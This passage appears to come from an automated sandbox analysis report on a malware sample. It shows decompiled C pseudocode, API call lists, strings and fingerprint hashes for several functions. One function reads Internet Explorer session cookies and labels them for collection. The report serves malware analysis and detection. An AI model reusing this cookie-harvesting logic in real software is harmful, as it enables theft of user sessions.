						 *((short*)(_t51 + 2)) = _t72;
						_t25 = _t65 * 2; // 0x4
						MultiByteToWideChar(0, 0, _a16, _t74, _t76 + _t25 + 4, _t74);
					}
					if(_a4 == 0x43 || _a4 == 0x45) {
						_t53 = 1;
						__eflags = 1;
					} else {
						_t53 = 0;
					}
					E00409CF9(_t53, 0, _t76);
					E0040CF40(_t76);
					_t43 = _v5;
				}
				return 0 | _t43 == 0x00000000;
			}

























    0x0040708b
    0x0040708f
    0x004070ce
    0x004070e3
    0x004070e4
    0x004070ee
    0x004070f1
    0x004070f6
    0x00407103
    0x00407106
    0x0040710d
    0x0040710f
    0x0040710f
    0x00407111
    0x00407098
    0x004070bb
    0x004070bd
    0x004070c2
    0x004070c2
    0x00407116
    0x00407124
    0x00407127
    0x0040712a
    0x00407130
    0x0040713b
    0x00407132
    0x00407132
    0x00407132
    0x0040713f
    0x00407140
    0x0040714e
    0x00407152
    0x00407159
    0x0040715b
    0x0040715c
    0x00407161
    0x00407165
    0x00407167
    0x0040716b
    0x00407178
    0x00407178
    0x00407183
    0x00407192
    0x00407192
    0x0040718c
    0x0040718c
    0x0040718c
    0x00407197
    0x0040719d
    0x004071a2
    0x004071a2
    0x004071b2

    APIs
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 004070B4
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 00407178
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ByteCharEnvironmentExpandFreeHeapMultiStringsWide
    • String ID: E
    • API String ID: 4193686461-3568589458
    • Opcode ID: 98c5ac30b2654fff8d877c05c642aba67df397f5a5144a1fcc36f5923742fe11
    • Instruction ID: 0a80c66c422c91f9f59ccba2c4feb8961f0da65f778ddf862aa9fa3feba8c548
    • Opcode Fuzzy Hash: 98c5ac30b2654fff8d877c05c642aba67df397f5a5144a1fcc36f5923742fe11
    • Instruction Fuzzy Hash: F831D931904204AADB11EFB4D845FDA77B8DF05304F10816BF505FB2D2D7789A49C79A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404001, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E00404001(void* __ebx) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __esi;
				signed int _t18;
				intOrPtr _t27;
				void* _t29;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t39;
				signed int _t40;
				void* _t42;
				void* _t47;

				_t40 = 0;
				_t37 = 0;
				_v8 = 0;
				 *0x412dd4(0x4126c8);
				_t18 = 0;
				_v16 = 0;
				_t42 =  *0x4126e0 - _t37; // 0x0
				if(_t42 <= 0) {
					L9:
					 *0x412dd8(0x4126c8);
					E004079B5(_t37, _t47, 0, "PopOpO03-3331111", _t40);
					return E0040CF40(_t40);
				}
				do {
					_t35 =  *0x4126e4; // 0x0
					_t23 = _t35 + _t18 * 4;
					if( *(_t35 + _t18 * 4) != 0) {
						_t36 = E0040D312(_t23 | 0xffffffff,  *_t23);
						_v12 = _t36;
						if(_t36 != 0) {
							_t27 = E0040D3C6(_t36);
							_t34 = _t27 + _t37;
							_v20 = _t27;
							_t29 = E0040CED8(_t34 + 1,  &_v8);
							_t40 = _v8;
							if(_t29 != 0) {
								E0040CF7C(_t37 + _t40, _v12, _v20);
								_t39 = _t34;
								 *((char*)(_t39 + _t40)) = 0x20;
								_t37 = _t39 + 1;
							}
							E0040CF40(_v12);
						}
					}
					_t18 = _v16 + 1;
					_v16 = _t18;
					_t47 = _t18 -  *0x4126e0; // 0x0
				} while (_t47 < 0);
				goto L9;
			}



















    0x00404009
    0x00404010
    0x00404012
    0x00404015
    0x0040401b
    0x0040401d
    0x00404020
    0x00404026
    0x00404094
    0x00404099
    0x004040a9
    0x004040b7
    0x004040b7
    0x00404029
    0x00404029
    0x0040402f
    0x00404035
    0x00404041
    0x00404043
    0x00404048
    0x0040404a
    0x0040404f
    0x00404052
    0x0040405b
    0x00404060
    0x00404065
    0x00404070
    0x00404075
    0x00404077
    0x0040407b
    0x0040407b
    0x0040407f
    0x0040407f
    0x00404048
    0x00404087
    0x00404088
    0x0040408b
    0x0040408b
    0x00000000

    APIs
    • RtlEnterCriticalSection.NTDLL(004126C8), ref: 00404015
    • RtlLeaveCriticalSection.NTDLL(004126C8), ref: 00404099
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeave
    • String ID: PopOpO03-3331111
    • API String ID: 3168844106-962168976
    • Opcode ID: a399a5be5b79f228f6b5957928eaabb3e15bb6ba2569f476f18499c359079621
    • Instruction ID: ae964b88e9df782e84ff779e792d65f5708a30c7ed2cc99191e8c98e3c5d5506
    • Opcode Fuzzy Hash: a399a5be5b79f228f6b5957928eaabb3e15bb6ba2569f476f18499c359079621
    • Instruction Fuzzy Hash: 4511CD31A00119EECB11EFAACD41ADE7BB5FF85314B10017AE604F72E1D7785A518B59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A193, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46networkCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E0040A193(void* __ecx, void* __edx, void* __esi, char* _a4) {
				long _v8;
				int _t14;
				char* _t23;

				_push(__ecx);
				if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
					_t11 = _v8;
					if(_v8 != 0) {
						_t23 = E0040CF2D(_t11);
						if(_t23 != 0) {
							_t14 = InternetGetCookieA(_a4, 0, _t23,  &_v8);
							_t30 = _t14;
							if(_t14 != 0) {
								_push(_t23);
								E00410EC7(__ecx, __edx, _t30, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
							}
							E0040CF40(_t23);
						}
					}
				}
				E00404BC8(0);
				return E00404803();
			}






    0x0040a196
    0x0040a1ab
    0x0040a1ad
    0x0040a1b2
    0x0040a1ba
    0x0040a1be
    0x0040a1c9
    0x0040a1cf
    0x0040a1d1
    0x0040a1d3
    0x0040a1e0
    0x0040a1e5
    0x0040a1e9
    0x0040a1e9
    0x0040a1ee
    0x0040a1b2
    0x0040a1f0
    0x0040a1fc

    APIs
    • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040A1A3
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040A1C9
    Strings
    • %SIE session cookies:%S, xrefs: 0040A1D7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CookieInternet$AllocateHeap
    • String ID: %SIE session cookies:%S
    • API String ID: 1720872598-348586552
    • Opcode ID: f672de692fdeaac871ec7c5d2309e232fbc017f3ea6e1157c339adceb9adaa80
    • Instruction ID: e5454a37bb16cc1a739e33ce88ca83c7f2a48920d0eefd30366c5ec76bd7e26e
    • Opcode Fuzzy Hash: f672de692fdeaac871ec7c5d2309e232fbc017f3ea6e1157c339adceb9adaa80
    • Instruction Fuzzy Hash: EFF0AFB2200104B6C730BB6BCC49DDF3E6DDFC2B41B00023AF908A5181EA798B51D2BE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F4CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F4CE(intOrPtr _a4, intOrPtr _a12) {
				short _v524;
				void* __edi;
				int _t23;
				intOrPtr _t24;

				_t23 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040DD3C( &_v524) != 0) {
					_t24 = _a4;
					E0040D2F3(PathFindFileNameW( &_v524), _t24 + 3);
					E0040CF7C(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t23 = 1;
				}
				return _t23;
			}







    0x0040f4e2
    0x0040f4f8
    0x0040f50a
    0x0040f520
    0x0040f52d
    0x0040f532
    0x0040f538
    0x0040f539
    0x0040f53e

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040F4F0
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040F518
      • Part of subcall function 0040D2F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,0040F525,?,?), ref: 0040D306
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 9693c0407248871a2c48f834560001864496959ee0a55fc4fcb4affdf8d58cc2
    • Instruction ID: 0e97196fcce3285a1a30ce9ec0008965205565818f1a31b4e5b8f163ac32ee4b
    • Opcode Fuzzy Hash: 9693c0407248871a2c48f834560001864496959ee0a55fc4fcb4affdf8d58cc2
    • Instruction Fuzzy Hash: BFF0A437A4032467CB20AFA8DC09FCB7BAC9F05745F004576B959F31C2DA78EA098694
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040541D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
    Download Yara Rule
    C-Code - Quality: 16%
    			E0040541D() {

				 *0x412dd4(0x412708);
				E0040CF40( *0x412728);
				 *0x412720 =  *0x412720 & 0;
				 *0x412728 =  *0x412728 & 0;
				 *0x412704 = 0;
				 *0x412dd8(0x412708);
				return 0;
			}



    0x00405424
    0x00405430
    0x00405437
    0x0040543d
    0x00405444
    0x0040544a
    0x00405451

    APIs
    • RtlEnterCriticalSection.NTDLL(00412708), ref: 00405424
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • RtlLeaveCriticalSection.NTDLL(00412708), ref: 0040544A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterFreeHeapLeave
    • String ID: rsldps
    • API String ID: 3296397286-2437408065
    • Opcode ID: 9daea3a1931503759bf2de641527713b49afd8e623dac153174ee1ed69bfbea8
    • Instruction ID: 274a606839fa3967768612f91037daebffa198f8dba70c0c0ea7218726266eb8
    • Opcode Fuzzy Hash: 9daea3a1931503759bf2de641527713b49afd8e623dac153174ee1ed69bfbea8
    • Instruction Fuzzy Hash: 54D092328615219B8B026BA4FF464D737E9EF0A266300D077F520D20F0D7F908E18BAD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411018, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7stringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00411018(WCHAR* _a4) {

				lstrcpyW(_a4, 0x413260);
				return lstrcatW(_a4, L".lll");
			}



    0x00411021
    0x00411036

    APIs
    • lstrcpyW.KERNEL32(00411377,00413260), ref: 00411021
    • lstrcatW.KERNEL32(?,.lll), ref: 00411030
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcatlstrcpy
    • String ID: .lll
    • API String ID: 3905823039-2905095309
    • Opcode ID: 8028da1338b692a4fe11208eea41a88aca15c5e5d283de1ea6690db6da0ff1d4
    • Instruction ID: b9f9ebfaa2702b7983b9e6894d3e7aae2c5c32b632de3cc78fd48e4ec5ca6948
    • Opcode Fuzzy Hash: 8028da1338b692a4fe11208eea41a88aca15c5e5d283de1ea6690db6da0ff1d4
    • Instruction Fuzzy Hash: 30C04C71148205ABC6015F10DD09E4DBE61AB50746B10C435B24590170DBB546B1EB5D
    Uniqueness

    Uniqueness Score: -1.00%